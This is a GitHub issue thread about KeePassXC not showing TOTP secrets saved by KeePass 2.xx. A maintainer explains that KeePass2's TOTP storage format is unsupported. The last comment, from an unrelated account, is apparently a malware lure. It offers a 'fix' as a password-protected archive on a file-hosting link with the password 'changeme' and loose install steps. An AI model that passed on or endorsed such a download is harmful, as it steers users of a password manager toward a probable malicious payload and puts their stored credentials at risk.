### ISSUE TITLE
Opening .kdbx KeePass password with TOTP secrets already stored inside doesn't show them

### ISSUE THREAD

**Issue by lflaurflorin** [keepassxreboot/keepassxc#11224]
## Overview
In my KeePass (2.xx) Database I already stored 2FA seeds/codes for the online services I use and on which I have this enabled.
However, opening the same database in KeePassXC, the TOTP secrets don't show in the entries they are supposed to be (they are non-existent)

## Steps to Reproduce

1. Install latest KeePass 2.xx and create a database (.kdbx) 
2. Add at least 1 entry with username, password, and also save a TOTP seed
    (Edit Entry - Tools - OTP Generator settings...)
3. Save the database (.kdbx) with KeePass 2.xx
4. Open the same database with KeePassXC 
5. With the database open, check the entry (Right-Click - TOTP)
6. You will see that there is no TOTP code (it is empty)

## Expected Behavior
With the exact steps followed, I would have expected to find the exact TOTP
that was stored in the original database under KeePass, and i could just copy the code

## Actual Behavior
The TOTP menu is disabled and the codes are not accessible under KeePassXC

## Context
With sites that have 2FA enabled based on Authenticator App (TOTP), importing a database
from KeePass 2.xx (that has TOTP stored) to KeePAssXC may not be viable.

[NOTE]: # ( Paste debug info from Help → About here )
KeePassXC - Version 2.7.9
Revision: 8f6dd13

Qt 5.15.11
Debugging mode is disabled.

Operating system: Windows 11 Version 2009
CPU architecture: x86_64
Kernel: winnt 10.0.26100

Enabled extensions:
- Auto-Type
- Browser Integration
- Passkeys
- SSH Agent
- KeeShare
- YubiKey
- Quick Unlock

Cryptographic libraries:
- Botan 3.1.1

=========================

If there was ever a duplicate issue that was open and I may not have been aware of, I apologize in advance.

**Comment by droidmonkey** [comment]
We don't support KeePass2's method of storing TOTP secrets. See here: https://github.com/keepassxreboot/keepassxc/issues/7263#issuecomment-1409325004

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
